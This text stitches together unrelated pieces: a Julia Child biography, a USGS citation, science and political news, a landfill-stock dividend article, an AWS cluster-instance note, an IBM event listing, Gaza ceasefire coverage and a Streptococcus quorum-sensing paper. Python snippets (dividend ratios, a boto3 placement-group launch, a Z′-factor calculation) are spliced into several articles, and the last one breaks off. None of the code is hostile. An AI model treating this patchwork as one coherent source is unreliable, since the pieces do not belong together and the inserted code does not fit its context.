judo, traveled the world, and spoke flawless French.
Shortly after meeting Julia he wrote to his twin brother Charlie that Julia was “wildly emotional” and “an extremely sloppy thinker” who was “unable to sustain ideas for long.” Julia, for her part, was disappointed in Paul, whom she described as having “light hair which is not on top, an unbecoming blond mustache and a long unbecoming nose.” But very slowly and over time, the two fell quietly in love. In the summer of 1946, they traveled across the country together, accompanied by 8 bottles of whiskey, a bottle of gin and a bottle of mixed martinis. Paul wrote to Charlie, “(Julia) never ‘puts on an act’, or creates a scene. . . She frankly likes to eat and use her senses and has an unusually keen nose.” In another letter he reported “She also washes my shirts! Quite a dame!” They were married that September. Paul, who worked for the State Department, was soon posted to France. En route to Paris, Paul took Julia to the oldest restaurant in the country, La Couronne. This was her first experience with classical French cuisine and she fell in love. “The whole experience was an opening up of the soul and spirit for me . . . I was hooked, and for life, as it turned out.” Eager to learn how to make this food, Julia enrolled in the famed Cordon Bleu. Between classes, she studied French and roamed the open-air markets, talking with fishmongers, bakers and fruit sellers. She and Paul scoured the neighborhoods of Paris for friendly bistros, and under her husband’s patient tutelage, Julia’s palate grew more and more sophisticated. It was in Paris that Julia met two French women, Simca Beck and Louisette Bertholle, who were writing a cookbook aimed at an American audience. They needed an American collaborator. Julia was perfectly suited for the job. She began testing recipes. For nearly ten years, she devoted herself to writing, testing and re-writing. She confided to her sister-in-law: “Really, the more I cook the more I like to cook. To think it has taken me 40 yrs.
To find my true passion (cat and husb. excepted).” Simca emerged as her principal collaborator. As Paul and Julia were posted from Paris to Marseilles to Bonn to Oslo and on to Washington, they kept up a furious correspondence, typing hundreds of letters with six carbon copies. Julia kept meticulous notes and spent months perfecting recipes for one ingredient. She made so many egg dishes that she finally wrote to Simca, “I’ve just poached two more eggs and thrown them down the toilet.” When the women finally submitted their manuscript, the publisher turned it down. They made major revisions. Again, the publisher turned it down. “Hell and damnation,” Julia wrote to Simca. After repeated rejections, the book was finally picked up by a new publisher, Alfred Knopf, and nurtured by a young and talented editor, Judith Jones. In 1961, Julia finally held in her hands the book titled “Mastering the Art of French Cooking.” It had taken ten long years of relentless toil to produce. But it was not clear how the book would be received in America.

PBS and The French Chef

Now living in Cambridge, Massachusetts, Julia would soon find out. She was invited to appear on a television program called “I’ve Been Reading”, produced by WGBH, Boston’s public television station. The host of the show was reluctant to take time for a subject as trivial as cooking. But Julia was undeterred. She arrived with a hot plate, giant whisk and eggs, and made an omelet. Twenty-seven viewers wrote to the station, wanting to see more. The station produced three pilots, then launched into production of The French Chef. Produced and directed by Russ Morash, the series broadcast a total of 199 programs, produced between 1963 and 1966. Julia’s timing was perfect. More and more Americans were traveling abroad. The Kennedys were in the White House. The majority of middle-class women had not yet joined the work force; the bored-housewife syndrome had not yet been diagnosed as a national malaise.
For women who admired Jackie Kennedy chic, Julia’s translation of French cuisine offered a way to acquire a taste of French sophistication. Soon a nation fed mindlessly on Shake n’ Bake, RediWhip and Tang began experimenting with quiche Lorraine, boeuf bourguignon, and reine de saba. Upwardly mobile Americans who regarded cooking as a waste of time were suddenly seizing whisks, molds and copper bowls, transforming the kitchen into the most important room in the house and making cooking a national pastime. On camera, Julia’s presence was relaxed, reassuring and informal. But behind the unpolished, quirky charm was a driven perfectionist, convinced that there was a right and a wrong way to do things. Working closely with Paul and her associate producer Ruth Lockwood, Julia spent as many as 19 hours preparing for each half-hour segment. Detailed notes described every move she had to make. Her producer wrote out idiot cards that read “Stop gasping.” “Wipe brow.” The camera wore a helpful sign “Me camera.” The audience loved it. So did the critics. One newspaper called her “television’s most reliable female discovery since Lassie.” By the end of 1965, The French Chef was carried by 96 PBS stations. Sales of “Mastering the Art of French Cooking” were picking up speed – 200,000 copies sold. In 1965, Julia won a Peabody. In 1966, she won an Emmy. Time put her on the cover in a feature article on American food – “Everyone’s in the Kitchen.” In December 1966, Julia and Paul spent their first Christmas at La Pitchoune, a country house they built in Provence with royalties from the sales of “Mastering the Art of French Cooking.” Here they shopped for bread and meat at the local “boulanger.” They cured olives from their own trees. Around them, fields of roses and jasmine filled the air with perfume, along with violets and mimosa. For the next twenty years, Julia and Paul would escape to “La Peetch” as they called it.
In this place, so reminiscent of California, Julia rested, worked and wrote. By Christmas 1967, she was busy correcting proofs of The French Chef Cookbook, based on the television series. Reveling in domestic bliss, Paul wrote to his brother: “How fortunate we are at this moment in our lives! Each doing what he most wants, in a marvelously adapted place, close to each other, superbly fed and housed, with excellent health, and few interruptions.” But Julia’s health was not good. “Left breast off,” she wrote in her date book for February 18, 1968. Back in Boston, a routine biopsy called for a full, radical mastectomy. She stayed ten days in the hospital. Paul was devastated by the specter of cancer and the fear that he might lose her. Julia was stoic. But released from the hospital, she crept into a bathtub and wept. Soon public tragedy eclipsed private sorrows. Martin Luther King was killed. Bobby Kennedy was shot. Julia and Paul, now back in France, heard the news on their tiny transistor radio. Julia was devastated. In Provence, the church bells tolled. Riots broke out at the Democratic convention in Chicago. The times recalled the poetic lament, “The center cannot hold.” Julia focused her energies on completing Volume II of “Mastering the Art of French Cooking.” “Rushing from stove to typewriter like a mad hen,” she wrote. She was determined that this book must be “better and different.” The publisher’s deadline was pushed back repeatedly. Once again, she was locked up in a room; she wrote to her friend Avis DeVoto: “I have no desire to get into another big book like Vol II for a long time to come, if ever. Too much work. I am anxious to get back into TV teaching, and out of this little room with the typewriter. Screw it.” She got her wish. In 1970, after a four year hiatus, Julia returned to film more episodes of “The French Chef” — this time in color. Commercial television had competed for her talents, but she refused to be bought. 
“I’ll stick with the educators,” she said. Fans packed her cooking demonstrations. Talk show hosts clamored to interview her. She appeared with the Boston Symphony. She was feted at the Four Seasons. By now Julia had become a celebrity, and Paul reveled in his wife’s success. But Paul was suffering from chest pains. He underwent a coronary bypass. During the surgery, he suffered several small strokes. The strokes had affected his brain. He completely lost his French and verbal fluency. “Whatever it is, I will do it,” Paul had said. He had acted as her manager, served as her photographer, tested her recipes, proof-read her books, and was content to let the light shine on her, not on him. Now, the man that Julia had counted on for so much would need her support in his struggle to survive. Julia gave freely and fully. She did not spend time lamenting their fate. She did what she always did in times of crisis. She moved on. But the world in which Julia moved was changing — Vietnam, Watergate and the resignation of Richard Nixon. So, too, was the world of food. By the 1970s, a new generation of younger chefs was tossing aside traditional ways, discovering American ingredients and experimenting with new approaches that stressed regional influences, strong flavors, and fresh ingredients. The classic French cuisine that Julia loved so well now seemed slightly quaint. Julia never gave up her fondness for the classic style, but she encouraged the new up-and-coming generation, including Boston-based chefs Jasper White and Gordon Hammersly. Traditionally, chefs had labored in obscurity, behind closed doors. Julia was determined to change this. She labored tirelessly to promote the profession, and as a result of her efforts, chefs began to receive the recognition they deserved. Now they emerged as celebrities and food became a form of entertainment. 
Seated at their tables, restaurant patrons could vicariously participate in the unfolding drama of food preparation – bread pulled from brick ovens, chickens roasting on spits, vegetables tossed in open skillets. Julia was pleased that chefs were finally getting the attention they deserved, but she disliked the social snobbery that sometimes accompanied celebrity. She wrote to her friend and collaborator Simca Beck, “Food is getting too much publicity and is becoming too much of a status symbol and ‘in’ business.” Julia herself had shed what she called “the French straitjacket.” In her new series, Julia Child & Company and Julia Child & More Company, she moved with the times. In 1983, twenty years after the debut of The French Chef, Julia launched Dinner at Julia’s, filmed at the swank Hope Ranch, just outside Santa Barbara. Here she was cast in the role of a glamorous hostess, not the familiar, slightly eccentric cook that her fans had come to love. Many found the series disappointing and disconcerting. Julia seemed to shrug it off. She had made her mark. At this point most people would have been ready to retire. But not Julia. She wrote a big new cookbook, “The Way to Cook”, accompanied by a home video series. In her late 70s and 80s, she collaborated with a young talented director and producer, Geof Drummond, to make four new series — “Cooking with Master Chefs,” “In Julia’s Kitchen with Master Chefs,” “Baking with Julia,” and with her good friend Jacques Pépin, “Jacques and Julia at Home.” Each series was accompanied by a companion book. In 1992, Julia’s contribution to food and cooking in America was celebrated on the occasion of her 80th birthday. Three huge parties were held in her honor in Boston, Los Angeles and New York. Honors continued the following year, when Harvard University granted Julia an honorary doctorate. Her citation read “A Harvard friend and neighbor who has filled the air with common sense and uncommon scents.
Long may her soufflés rise.” The audience responded with thunderous applause. Yet one person was not there to celebrate her success. Since 1989, Paul Child had been confined to a nursing home. His once robust body had grown frail and withered. On the evening of May 12, 1994, he passed away. For six more years, Julia continued to live alone in the house that she and Paul had shared. But she grew weary of New England winters and yearned for the warmth of the California sun. In November 2001, Julia moved to Santa Barbara. Her kitchen was moved to Washington, D.C. The place where she had chopped, stirred and sautéed for forty years is now on display at the Smithsonian Institution. Her pots and pans, her knives and kitchen tools proudly proclaim a culinary revolution that transformed the way that Americans cook, eat and think about food. Julia Child died just two days before her 92nd birthday, on August 13, 2004, surrounded by her family and friends. The nation mourned her passing, still remembering her with affection and fondness – not simply for her contribution to American cooking, but for who she was: a deeply generous person, open to experience, eager to learn and to teach. The young and restless woman who once mourned her lack of talent became an American icon, and in countless kitchens across the country and around the world, her spirit still lives on. Bon Appetit!
USGS P 1399
Title: Stratigraphy and diagenetic alteration of Ellesmerian Sequence siliciclastic rocks, North Slope, Alaska
Authors: van de Kamp, P.C.
Publisher: U.S. Geological Survey
Ordering Info: USGS Publications Warehouse
Quadrangle(s): Barrow; Beechey Point; Harrison Bay; Meade River; Teshekpuk; Wainwright
Keyword(s): Bedrock; Generalized; Geology; Structure Contours
Citation: van de Kamp, P.C., 1988, Stratigraphy and diagenetic alteration of Ellesmerian Sequence siliciclastic rocks, North Slope, Alaska, in Gryc, George, ed., Geology and exploration of the National Petroleum Reserve in Alaska, 1974 to 1982: U.S. Geological Survey Professional Paper 1399, p. 833-854, scale 1:1,000,000.
University of Washington Researchers Play Leading Role in Major Study of Human Genome Function
6/14/2007 1:37:11 AM
Scientists at the University of Washington and other members of an international consortium have completed a multi-year research effort that dramatically boosts understanding of how the human genome functions. While previous studies of the human genome have focused mainly on genes, this study provides insight into the non-gene sequences making up the vast majority of the genome. Buried in non-gene sequences are so-called "regulatory elements" that contain instructions for switching genes on or off, and for controlling how DNA is packaged and replicated within a human cell. Scientists believe these DNA sequences may play a very important role in some diseases, such as prostate or colon cancer.
Mali’sa is a student government officer at the Community College of Allegheny County (CCAC) and through her work with One Pittsburgh became a leader among students speaking out against tuition increases at CCAC and our state-related universities. Mali’sa’s leadership helped students at CCAC fight off a mid-year hike in tuition, but she is all too aware that the war is far from over. She joined us in Alabama because speaking out has become second nature to her, and, I suspect, the time out of the classroom and into the sun was nice. At 19, Mali’sa hasn’t voted too often. But the thought of those rights being stripped from people has her infuriated. When I asked her what she thought about Pennsylvania passing voter legislation similar to the law we were protesting in Alabama, she had trouble finding words strong enough to capture her outrage. But she’ll be working this summer and beyond to make sure that people understand that voter ID laws affect everyone, not just folks who don’t have ID. When entire populations are left out of voting, elections become skewed, and those who are elected, like those who are voting, simply fail to represent the majority of Americans. That of course is the point, and the crime, of voter suppression. Since being home, Mali’sa has been playing catch-up with school and plotting a student-led revolution.
By Ryan Fitzwater
It's not a pretty business picking up the trash, but someone has to do it. And at the end of the day, it's good business. In the United States alone, we create more than 250 million tons of trash every year. And more than half of our waste ends up in landfills. With populations continuing to grow and consume more and more every year, we're producing more trash than ever before. This is good news for companies involved in the $52-billion waste management industry, as they're turning more trash into more profits. Profits that many then pass along to stockholders through dividends.
The Kings of Trash
While you might think that big money is made in the service side (literally picking up trash), it's actually found on the ownership side. Not ownership of the trash itself, but of the land used to store it. Owners of landfills that have a large amount of space left for trash (also known as airspace) have an advantage in the waste disposal business. An advantage that lets them collect big returns on what people throw out every day. I tend to like sectors that have a strong advantage in down markets, and waste management is one of them. You can still collect quality dividends while everything else is tanking. The landfill industry was very resilient through the recent financial crisis. While revenue growth stalled during the downturn, companies were still able to create strong cash flow and defend their dividends. Many dividend payers in other industries were freezing or cutting their dividends through the financial crisis, while Republic Services and Waste Management continued to grow theirs. (Waste Connections, the youngest company of the three, didn't start paying a dividend until 2010.) And the "Three Kings of Trash" truly have an advantage over competitors (or would-be competitors). They have extensive experience in working regulatory hurdles. 
Squeezing Out the Competition
I'm sure any CEO in the waste management business would be able to list countless unnecessary regulations that hurt their business. But extensive regulations also give the established players a big advantage. The landfill industry is highly regulated. It entails constant investment to remain compliant. Growing environmental regulations have made it more and more costly to operate and own landfills. It requires large amounts of capital to construct, organize and monitor sites. And permits today require 30 years of environmental monitoring after a landfill closes. This is a major financial commitment that has to be planned well in advance. The final price tag on a landfill… about $1 million per acre to construct, operate and finally close in accordance with regulations. With the amount of capital required to operate landfills coupled with a dumpster of regulations, new players in the game have a tough time breaking into the market and finding their feet. That's why industry revenue is driven to the established kings of the industry, while smaller competitors sit on the sidelines.
Taking Out the Trash
Let's take a look at the chart below to help decide which of the Three Kings of Trash stand to benefit investors the most: Based on the chart above, I'd be more inclined to pick up shares of Waste Connections first and then Republic Services - leaving Waste Management out on the curb. While Waste Management does have the highest dividend yield and return on equity (something all investors should consider when researching a stock), it clearly has some other issues that raise a red flag. First, it has a high debt-to-equity ratio of 151.97%. This means that creditors currently have more money in the company than stockholders have. Not a good sign. Second, it has a high dividend payout ratio of 96.06%. 
And yes, some can argue that they prefer companies with a higher dividend payout ratio since it means investors are receiving a higher amount of earnings. But I tend to agree with Investment U income expert Marc Lichtenfeld. A payout ratio (preferably based on cash flow rather than earnings) of 75% or less means a company can reinvest its cash back into the business to fuel future growth. Not to mention, as the payout ratio approaches 100%, it signals that the dividend payments are in jeopardy of being cut. Waste Management also has the lowest operating and profit margins of the three kings. And it has the highest price-to-book ratio of 2.52. The other kings sit at much more attractive levels of 1.28 and 2.20. And Waste Management only grew earnings 3.54% year-over-year in its latest quarter, while Republic Services and Waste Connections both had earnings growth in the double digits. Of course, those who are interested in the best-yielding stock can still consider Waste Management. Over the past five years it has grown its dividend 8.85%. But once again, it placed below its competitor Republic Services, which grew its dividend 15.78% over the same period of time. Our stock breakdown winner, Waste Connections, has only been paying its dividend since 2010, so we can't calculate a five-year dividend growth rate. And it does have the lowest yield of 1.14%. But it has a one-year dividend growth rate of 53.33% and will likely continue to grow its dividend in the future.
Get Your Fill of Landfills
Investors should consider gaining exposure to the landfill market. It's one that should continue to offer steady cash flow and dividends as our trash piles up, even in a down market. And as I mentioned above, the three kings have established operations and hold higher ground over smaller players. I would just be more inclined to pick up shares of Waste Connections or Republic Services over Waste Management. 
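The screening logic above boils down to two ratios. Here is a minimal Python sketch using the figures quoted for Waste Management; the function names and the 75%/100% cutoffs simply encode the rules of thumb from this article, not any standard screening API:

```python
# Hypothetical helpers encoding the article's two rules of thumb:
# payout ratio <= 75% and debt-to-equity <= 100% (i.e., 1.0).

def payout_ratio(dividends_paid: float, earnings: float) -> float:
    """Share of earnings paid out as dividends."""
    return dividends_paid / earnings

def debt_to_equity(total_debt: float, shareholder_equity: float) -> float:
    """Above 1.0, creditors have more money in the company than stockholders."""
    return total_debt / shareholder_equity

def dividend_looks_safe(payout: float, dte: float) -> bool:
    return payout <= 0.75 and dte <= 1.0

# Waste Management's quoted figures: 96.06% payout, 151.97% debt-to-equity.
print(dividend_looks_safe(0.9606, 1.5197))  # → False: both red flags trip
```

The same two lines would screen Republic Services or Waste Connections once their filings supply the inputs.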
I believe they have more room to grow their bottom lines and their dividends in the future.
Disclosure: Investment U expressly forbids its writers from having a financial interest in any security they recommend to our subscribers. All employees and agents of Investment U (and affiliated companies) must wait 24 hours after an initial trade recommendation is published online - or 72 hours after a direct mail publication is sent - before acting on that recommendation.
UNITED NATIONS, March 13 (Xinhua) -- A Chinese envoy stressed here on Thursday that the ongoing Ukraine crisis should be resolved through political and diplomatic means so as to avoid further escalation of the tension. Liu Jieyi, China's permanent representative to the United Nations, made the remarks at a Security Council meeting on the situation in Ukraine. "China has been following closely the development of the situation on the ground," which remains "highly complex and sensitive," said Liu. "What we are seeing today in Ukraine is the result of a complex intertwinement of historical and contemporary factors," he said, adding that China condemns the recent extreme and violent acts there. The envoy stressed China's objective and fair position on the Ukraine issue. It is China's long-standing position not to interfere in others' internal affairs and to respect others' sovereignty and territorial integrity, he said. "It is the first priority for all parties concerned to exercise calm and restraint and prevent further escalation of the tension," Liu said, insisting that a solution be found "through political and diplomatic means", while the legitimate rights and interests of all ethnic groups in Ukraine be fully ensured. "We hope that all parties concerned would appropriately tackle the differences through communication and coordination in the fundamental interests of all ethnic groups in Ukraine and the overall interests of regional peace and stability," he said. China supports the constructive efforts and good offices of the international community to de-escalate the situation in Ukraine, and is open to any proposals and suggestions that could help ease the tension, the envoy added. "We will continue to play a constructive role in bringing about a political settlement of the Ukrainian issue," he said.
Cluster Compute Instances provide a high-performance network interconnect along with high-performance CPUs. For example, the cc2.8xlarge instance type has two eight-core processors with hyper-threading enabled (16 physical cores with 32 threads). When these instances are grouped together and launched in the context of an EC2 Placement Group, the instances benefit from a high-bandwidth, non-blocking interconnect system, which makes them ideal for applications that require lots of network I/O (e.g., High Performance Computing (HPC) applications and other demanding network-bound applications). Be sure to reference Amazon's documentation for current limitations. See Cluster Compute Instance Concepts. © 2006-2014 RightScale, Inc. All rights reserved. RightScale is a registered trademark of RightScale, Inc. All other products and services may be trademarks or servicemarks of their respective owners.
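A placement group has to exist before instances are launched into it. The following is a minimal boto3 sketch of that flow; the AMI ID and group name are placeholders, the request-building helper is split out purely for illustration, and cc2.8xlarge has since been superseded, so substitute a current instance type in practice:

```python
def build_cluster_launch_params(ami_id, group_name,
                                instance_type="cc2.8xlarge", count=4):
    """Assemble a run_instances request targeting a cluster placement group."""
    return {
        "ImageId": ami_id,
        "InstanceType": instance_type,
        "MinCount": count,   # all-or-nothing: a partial cluster is not useful
        "MaxCount": count,
        "Placement": {"GroupName": group_name},
    }

def launch_cluster(ami_id, group_name, count=4):
    import boto3  # requires AWS credentials to actually run
    ec2 = boto3.client("ec2")
    # The "cluster" strategy packs instances onto the low-latency,
    # non-blocking interconnect described above.
    ec2.create_placement_group(GroupName=group_name, Strategy="cluster")
    return ec2.run_instances(**build_cluster_launch_params(
        ami_id, group_name, count=count))
```

Requesting all nodes in one call (MinCount == MaxCount) reduces the chance of a partially-filled group when capacity is tight.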
Building and Scaling Human-Centered Citizen Experiences–Keys for Success
Sponsored by IBM Watson Health
Wednesday, December 11, 2:45 pm – 3:45 pm
Offering Leader – IBM Social Program Management, IBM Watson Health
Legislation, recommendations, and citizen demand tell us that great digital services are consistent, user-friendly, and available online from any device. What does it take to make this a reality? Hear practical advice for business and technical leaders based on the lessons learned building and scaling multi-program portals used by government agencies in states, counties, and globally. Why are some states using native web apps for citizen engagement, some using responsive web applications, and some both? What is a Design System, and why is it not enough on its own to deliver great online services? How do you balance build-vs.-buy decisions for citizen portals? These questions and more are addressed in this session. U.S. federal government customer satisfaction declined in 2018. Why? As with most things, it's complex… but long wait times, poor office experiences, and difficult-to-use technology all contribute to citizens feeling like governments don't value them or their time, or treat them with fairness and respect. One of the impacts of this is reduced engagement between citizens and their government. In fact, research suggests that this might explain why people receiving benefits are less likely to vote. To tackle this, governments are prioritizing inclusive, accessible public services. They're involving their citizens in the process of designing those services. And they're promoting digital as the default channel for engaging with government through their own digital strategies. And yet, while by many measures eGovernment is strengthening globally, there's still a huge distance to travel. The US Federal Government spends 11.4 billion hours annually processing paper forms. 
Almost half of US states don't have an online portal for benefits applications designed for use on a mobile device. But building great digital services is not easy. Using examples both good and not so good, this session explores the business, technical and operational challenges for any government organization looking to take applications for services online, and suggests strategies for dealing with them.
About GTS Educational Events
If you are a nonprofit or public sector group looking to create a conference, workshop or educational event with impact, look to GTS. We believe educational events are successful when participants learn and grow and then return to their organizations and communities to make them stronger. We look forward to continuing our work with the broad spectrum of organizations striving to make a difference for the people and communities they serve.
Alex Hepp, City of Hopkins
Bill Bleckwehl, Cisco
Dave Andrews, DEED
Jay Wyant, Minnesota IT Services
Jim Hall, Ramsey County
Matt Bailey, IBM
Melissa Reeder, League of Minnesota Cities
Nathan Beran, City of New Ulm
Sue Wallace, IT Futures Foundation
Lisa Meredith, Minnesota Counties Computer Cooperative
Justin Kaufman, Minnesota IT Services
Renee Heinbuch, Washington County/MNCITLA
Jerine Rosato, Ramsey County
David Berthiaume, Minnesota IT Services
Cory Tramm, Sourcewell Tech
Tomas Alvarez, Federal Reserve
Tom Ammons, MN.IT – Central
Dave Andrews, MN State Services for the Blind
Susan Bousquet, MN.IT – DOT
Robert Granvin, Metro State
Alex Hepp, City of Hopkins
Shawntan Howell, Ramsey County
Jenny Johnson, Metropolitan Council
Millicent Kasal, MN.IT – Central
Ping Li, MN.IT – MMB
Chibuzor Nnaji, MN.IT – DHS
Mehrdad Shabestari, MN.IT – Central
Israel-Gaza ceasefire: Negotiators look to next phase for peace Gaza celebrates 'victory' over Israel, but Hamas demands for open borders still unmet Israel and Gaza's ruling Hamas agreed Tuesday to an open-ended ceasefire after seven weeks of fighting — an uneasy deal that halts the deadliest war the sides have fought in years, with more than 2,200 killed, but puts off the most difficult issues. Hamas declared victory, even though it had little to show for a war that killed 2,143 Palestinians, wounded more than 11,000 and left some 100,000 homeless. On the Israeli side, 64 soldiers and six civilians were killed, including two killed by Palestinian mortar fire shortly before the cease-fire was announced. Large crowds gathered in Gaza City after the truce took effect at dusk, some waving the green flags of Hamas, while celebratory gunfire and fireworks erupted across the territory. Mahmoud Zahar, a senior Hamas leader, promised to rebuild homes destroyed in the war and said Hamas would rearm. "We will build and upgrade our arsenal to be ready for the coming battle, the battle of full liberation," he declared, surrounded by Hamas gunmen. The Israeli response was more subdued. Complex talks to begin in one month "This time we hope the cease-fire will stick," said Israeli government spokesman Mark Regev. He portrayed the deal as one Hamas had rejected in previous rounds of negotiations. Israeli Prime Minister Benjamin Netanyahu faced some criticism from hard-line critics and residents of Israeli communities near Gaza who said the deal failed to defuse the threat from Gaza militants. Since July 8, Hamas and its allies have fired some 4,000 rockets and mortars at Israel, and tens of thousands of Israelis evacuated areas near Gaza in recent weeks. Under the Egyptian-brokered deal, Israel is to ease imports into Gaza, including aid and material for reconstruction. 
It also agreed to a largely symbolic gesture, expanding a fishing zone for Gaza fishermen from three to six nautical miles into the Mediterranean. "As soon as calm is restored, the delivery of urgently needed humanitarian assistance to the people in Gaza must be accelerated," U.S. Secretary of State John Kerry said in a statement. Canada's Foreign Affairs Minister John Baird "cautiously" welcomed the ceasefire and reiterated the importance of focusing on the needs of Gaza residents. “Palestinians in Gaza have suffered greatly under Hamas’s reign, and it is high time that their needs are put first over their rulers’ blind ambition," he said in a statement. In a month, talks are to begin on more complex issues, including Hamas' demand to start building a seaport and airport in Gaza. Israel has said it would only agree if Hamas disarms, a demand the militant group has rejected. Kerry said the U.S. will continue engaging in those talks. "We are approaching the next phase with our eyes wide open," Kerry's statement reads. "Certain bedrock outcomes ... are essential if there is to be long term solution for Gaza." The cease-fire went into effect at 7 p.m. local time (noon ET) Tuesday, and violence persisted until the last minute. About an hour before the cease-fire, 12 mortar shells hit an Israeli communal farm near Gaza, killing two Israelis and wounding seven other people, two of them critically, the Israeli military said. Between 5 p.m. and 7 p.m., Gaza militants fired 83 rockets, of which 13 were intercepted. In Gaza, an Israeli airstrike minutes before the start of the cease-fire toppled a five-story building in the town of Beit Lahiya, witnesses said. Twelve Palestinians, including two children, were killed in several Israeli airstrikes before the truce took hold, Gaza police said. In Gaza City, a 20-year-old woman was killed and several dozen people were wounded by celebratory gunfire after the truce was announced. 
Palestinian President Abbas to play key role Throughout the war, Israel launched some 5,000 airstrikes against Gaza, saying it targeted sites linked to militants, including rocket launchers and weapons depots. About three-fourths of those killed in the strikes have been civilians, according to the U.N. and Palestinian officials. In recent days, Israel had stepped up its pressure on Hamas, toppling five towers containing offices, apartments and shops since Saturday. Two of those buildings were brought down in airstrikes early Tuesday that destroyed dozens of apartments and shops. Despite its victory celebrations Tuesday, Hamas failed to force an end to the Gaza blockade, imposed by Israel and Egypt after the Islamic militants seized the seaside strip in 2007. Under the restrictions, virtually all of Gaza's 1.8 million people cannot trade or travel. Only a few thousand are able to leave the coastal territory every month. The ceasefire deal makes no mention of ending the ban on exports from Gaza or significantly easing travel. A spokesperson for United Nations Secretary General Ban Ki-moon welcomed the ceasefire announcement and said any violations would be "utterly irresponsible," in a statement released Tuesday. "Any peace effort that does not tackle the root causes of the crisis will do little more than set the stage for the next cycle of violence," the statement warns. The UN statement also said Gaza must be brought back under one legitimate Palestinian government. Palestinian President Mahmoud Abbas, a long-time rival of Hamas, likely will play a key role in any new border deal for Gaza. Abbas lost control of Gaza after Hamas seized the territory in 2007. He is expected to regain a foothold there under the Egyptian-brokered agreement. Forces loyal to Abbas would be posted at Gaza's crossings to allay fears by Israel and Egypt about renewed attempts by Hamas to smuggle weapons into the territory. 
Israel is also concerned that material for reconstruction would be diverted by Hamas for military purposes. In a televised address Tuesday night, Abbas said the end of the war underscored the need to find a permanent solution to the conflict with Israel. "What's next? Gaza has been subjected to three wars. Shall we expect another war in a year or two? Until when will this issue be without a solution?" he asked. Aides have said Abbas plans to ask the UN Security Council to demand Israel's withdrawal from all lands captured in the 1967 Mideast war to make way for an independent Palestinian state. Abbas alluded to the plan in his speech. "Today, I'm going to give the Palestinian leadership my vision for a solution and after that we will continue consultations with the international community," he said. "This vision must be clear and well defined and we are not going to an open-ended negotiation."
- An earlier version of this story reported wrongly that a ceasefire announcement would be made in Cairo at 1 p.m. ET. In fact, the time was set for noon ET, Reuters reported, correcting a previous headline.
Aug 26, 2014 11:40 AM ET
The main components of the quorum-sensing system are expected to be favorable targets for drug development to combat various chronic infectious diseases. ComA of Streptococcus is an ATP-binding cassette transporter containing a peptidase domain (PEP), which is essential for the quorum-sensing signal production. Using high-throughput screening, we found a potent small molecule that suppressed the S. mutans quorum-sensing pathway through inhibition of PEP activity. The compound effectively attenuated the biofilm formation and competence development of S. mutans without inhibiting cell growth. The kinetic and structural studies with this molecule and a related compound unexpectedly revealed an allosteric site of PEP. This relatively hydrophobic site is thought to undergo large structural changes during the catalytic process. These compounds inhibit PEP activity by binding to and suppressing the structural changes of this site. These results showed that PEP is a good target for inhibitors of the Streptococcus quorum-sensing system.
Streptococcus is a genus of Gram-positive bacteria that consists of a wide variety of pathogenic and commensal species. Some commensal species are known to be opportunistic pathogens. Notably, oral streptococci, such as S. mutans, are not only cariogenic but also occasionally enter the human circulatory system and cause life-threatening infective endocarditis by forming a biofilm on the native or prosthetic heart valves, especially in patients from Asia [1, 2]. Formation of the biofilm, together with its inherent resistance to antibiotics, is the main factor in the chronic and refractory nature of this infection [3]. Generally, bacterial biofilm formation is thought to be regulated by the quorum-sensing system [4]. The quorum-sensing system is a bacterial cell–cell signal communication system mediated by an inherent signal molecule called an autoinducer [5]. The ComABCDE pathway is the quorum-sensing system in some species of Streptococcus, such as S. 
mutans and S. pneumoniae, in which autoinducer peptides are processed from the precursor ComC and concomitantly exported to the extracellular space by ComA and ComB [6, 7]. The accumulated autoinducers bind to the membrane-bound receptor kinase ComD, which subsequently phosphorylates the response regulator ComE to activate transcription of a specific set of genes, such as those essential for the competence development in S. mutans [6], S. pneumoniae [7, 8], and S. gordonii [9] and the biofilm formation in S. mutans [10] and S. pneumoniae [11]. It is expected that inhibitor development against this system would provide a way to design drugs for various clinical conditions caused by chronic biofilm infections. One purported benefit of quorum-sensing inhibitors is that, because they do not directly kill bacterial cells, they should exert lower selection pressure and, hence, be less susceptible to development of drug resistance than are antimicrobials [12]. ComA is a bi-functional ATP-binding cassette (ABC) transporter that comprises three domains: an N-terminal peptidase domain (PEP), a transmembrane domain, and a C-terminal nucleotide-binding domain [13–15]. PEP is a highly specific peptidase belonging to a cysteine protease family [13, 16–18]. We have previously elucidated the substrate recognition mechanism of PEP [17, 18] in which the tight cleft at the active site of PEP binds the Gly–Gly motif of ComC and a shallow hydrophobic concave surface of PEP accommodates the conserved hydrophobic residues in the N-terminal α-helical region of ComC (Fig. 1A). Understandably, development of inhibitors for the quorum-sensing system of Gram-positive bacteria has mainly targeted the signal–receptor interaction, that is, substrate-mimetic receptor inhibitors [19, 20]. 
One major drawback of this strategy is that amino acid sequences of autoinducer peptides are highly variable among bacterial species, or in some cases even among strains, and therefore, labor-intensive drug development would have to be done for each species. We believe that PEP of ComA is a more suitable target for inhibitor development for the following reasons: First, PEP catalyzes the initial step of the quorum-sensing system of Streptococcus. Second, among ubiquitous ABC transporters, ComA-like transporters equipped with the peptidase domains are found only in prokaryotes, thus minimizing the possibility of unpredictable adverse effects [13]. Third, because, as far as we have been able to determine, all streptococcal PEPs have a common substrate recognition mechanism [17], it may be possible to develop a quorum-sensing inhibitor that is effective for a range of streptococcal species in which PEPs play an important role in the quorum-sensing system. In this study, we set out to screen a library of small compounds for the inhibitory activity against S. mutans PEP (MuPEP1) by high-throughput screening.
Results and Discussion
High-throughput Screening of PEP Inhibitors
We established a high-throughput screening system using a fluorescence-labeled substrate (tCComC-AFC) (Fig. 1B and Supplementary Fig. S1). S. cristatus ComC (CComC) was used because S. mutans ComC could not be chemically synthesized and CComC was a good substrate of MuPEP1 [17]. The first screening of 164,514 compounds (Z′-factor value of 0.93, Supplementary Fig. S2) yielded 951 hits (0.58%) that inhibited MuPEP1 activity by >50% at a compound concentration of 20 μM. After the inhibitory activities of the selected compounds were re-evaluated by high-performance liquid chromatography assay, dose-dependent inhibition against MuPEP1 was examined in a second screening that yielded 110 compounds with IC50 values of <20 μM. 
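The Z′-factor quoted for the assay is the standard screening-window statistic computed from positive- and negative-control wells. A short Python illustration, with invented control readings (the formula is standard; the numbers are not from this study):

```python
# Z' = 1 - 3*(sd_pos + sd_neg) / |mean_pos - mean_neg|
# Values above ~0.5 conventionally indicate an excellent assay window;
# the 0.93 reported above implies tight, well-separated controls.
from statistics import mean, stdev

def z_prime(pos, neg):
    return 1 - 3 * (stdev(pos) + stdev(neg)) / abs(mean(pos) - mean(neg))

# Invented fluorescence readings: uninhibited enzyme vs. no-enzyme wells.
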